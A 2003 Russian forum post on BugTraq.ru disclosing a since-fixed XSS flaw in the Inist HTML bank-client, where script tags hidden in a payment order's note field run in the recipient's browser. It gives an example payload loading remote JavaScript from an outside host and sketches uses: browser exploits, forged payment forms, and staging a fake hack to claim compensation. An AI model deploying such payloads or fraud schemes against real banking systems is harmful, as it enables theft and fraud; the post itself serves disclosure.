информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Атака на InternetСетевые кракеры и правда о деле ЛевинаГде водятся OGRы
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Десятилетняя уязвимость в sudo 
 Блокировка Flash поломала китайскую... 
 Анализ SolarWinds-атаки от Microsoft 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Ошибка в банк-клиенте от Инист 26.01.03 14:05  Число просмотров: 5726
Автор: Komlin Статус: Незарегистрированный пользователь
Отредактировано 27.01.03 12:30  Количество правок: 3
<"чистая" ссылка>
Сейчас всё большую популярность приобретают Банк - Клиенты построенные по HTML технологии.

Действительно, у HTML много преимуществ особенно для пользователя и для банка в первую очередь лёгкость модернизации.

К сожалению эти системы с точки зрения безопасности являются наследниками многих болезней HTML сиcтем.

Фактически такой банк-клиент частный случай транспортной WEB системы , где в роли сообщения выступает поле примечания платёжки. Думаю, некоторые из присутствующих помнят как взламывались практически 100 % почтовых систем и форумов.

http://www.hackzone.ru/articles/testmail.html

Поэтому мне пришла в голову простая мысль: а что если в платёжку, в поле примечание, попытаться включить старую добрую теговую атаку, слегка замаскировав её, и отослать такую платёжку пользователю HTML-вского банк клиента

Например (взлом клиета)
НДС 20% -X руб. Оплата по счёту # Y от zz.zz.zz за товар A индекс по Internet-каталогу :
<script src=http://magazin.narod.ru/ZAKAZ#222.js></script>

Если эта платёжка отправляется по банк-клиенту с крупного банка, то скорее всего она дойдёт атакуемого без изменений, поскольку бухгалтера-операционистки часто даже слова HTML не знают и врядли усомнятся, что это странный индекс товара (в платёжках и более странные формулировки встречаются). Им главное, чтобы НДС и номер счёта был.

Смысл атаки в том, что код из ZAKAZ22.js спокойно выполнится на машине у клиента в момент просмотра списка платёжек или самой платёжки

В этом коде может содержаться либо эксплойт для браузера ( новые ошибки в IE появляются с завидной регулярностью, кроме того никто из пользователей всё равно браузеры не патчит, поэтому наверняка сойдёт и старая), либо скрытый генератор формы идентичной платёжной на отсылку банку.

Возможен и др. вариант применения ошибки: имитация взлома по вине банк-клиента с целью получения компенсации от банкы


Цитата с форума bankir.ru
"Вот придёт к Вам мошенник c лицом честного клиента и скажет: "Вот, смотрите меня аттаковали три месяца назад(помните я звонил Вам насчёт платежа,а Вы сказали, что с подписью всё в порядке). Милиция и эксперты вот выянили, что это было. Вот копия присланной платёжки, вот следы взлома, вот код эксплойта который был применён, а похитителя увы не нашли..., вот справка обокончании предварительного следствия.
Эксперты считают, что и доля Вашей вины здесь есть, не примите ли на себя часть расходов, чтобы долго и бесполезно не судится?"

Атака № 1 проверялась на демо-версии популярноего банк -клиента Инист (входящего в тройку лидеров рынка) .
http://www.inist.ru/servlets/ibc

Туда были вставлены простые извещения вида <script>... </script> и <iframe src= и обе сработали, причём выданы после обработки сервером.

В настоящее время ошибка устранена производителем. Справеливости ради надо заметить, что в своём ответе последний заявил, что считает данную ошибку несуществнной.

Да, ошибка была. Исправили.
Можно ли было ею воспользоваться? Сомнительно.


К сожалению, он никак не аргументировал свою точку зрения.

Первоначальное сообщение об ошибке и его обсуждение Вы можете посмотреть по нижеприведённой ссылке

Ссылка
<hacking> Поиск 
  • Ошибка в банк-клиенте от Инист - Komlin 26.01.03 14:05 [5726]








Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2021 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach